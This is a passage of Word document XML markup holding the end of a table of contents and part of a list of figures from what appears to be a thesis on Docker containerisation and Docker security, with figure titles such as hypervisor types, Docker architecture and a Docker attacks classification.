            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31EB94CB" w14:textId="5E4A30C7" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859314" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1 Project management</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859314 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35B80564" w14:textId="039D9481" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859315" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Resources</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859315 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FB39867" w14:textId="0133D1F6" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859316" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2 Project planning</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859316 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57EAA7C5" w14:textId="28F2C07B" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859317" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Logbook</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859317 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DB27773" w14:textId="60331040" w:rsidR="00876746" w:rsidRDefault="00876746">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="166D7EF7" w14:textId="448FF5D5" w:rsidR="003D57F8" w:rsidRDefault="003D57F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D6C671" w14:textId="0787C3A2" w:rsidR="003D57F8" w:rsidRDefault="003D57F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E68C483" w14:textId="1447CB4E" w:rsidR="003D57F8" w:rsidRDefault="003D57F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214F309A" w14:textId="76083F6F" w:rsidR="003D57F8" w:rsidRDefault="003D57F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35768E12" w14:textId="77777777" w:rsidR="003D57F8" w:rsidRDefault="003D57F8"/>
    <w:p w14:paraId="438BD680" w14:textId="3D1B3AD3" w:rsidR="00793908" w:rsidRDefault="006F0639" w:rsidP="006F0639">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0639">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIST OF FIGURES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC7D9A" w14:textId="12C3CFC5" w:rsidR="006F0639" w:rsidRPr="006F0639" w:rsidRDefault="00202FC8" w:rsidP="006F0639">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FIGURES</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PAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8D627A" w14:textId="28E3F8C1" w:rsidR="00335AC3" w:rsidRDefault="00335AC3">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc86858592" w:history="1">
        <w:r w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1: type 1 and type 2 hypervisors</w:t>
        </w:r>
        <w:r w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> [4]</w:t>
        </w:r>
        <w:r w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858592 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A07C2AD" w14:textId="4778455C" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858593" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 2: Virtual Machine (VM) Vs Containerisation architecture </w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[9].</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858593 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76C45750" w14:textId="0DEE87C5" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858594" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 3: Docker architecture </w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[24]</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858594 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65568A8D" w14:textId="1A116895" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858595" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 4: Docker image layers </w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[28]</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858595 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="440E320B" w14:textId="524BECA2" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858596" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5: sample Dockerfile.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858596 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FA29C45" w14:textId="5FFC5877" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858597" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 6: Docker attacks classification </w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[77]</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858597 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C51FFD2" w14:textId="249AE81C" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858598" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 7: Research onion </w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[81]</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858598 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00D005C4" w14:textId="7250BB6F" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858599" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8: the research design process.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858599 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4779E7F3" w14:textId="581DA6B0" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858600" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
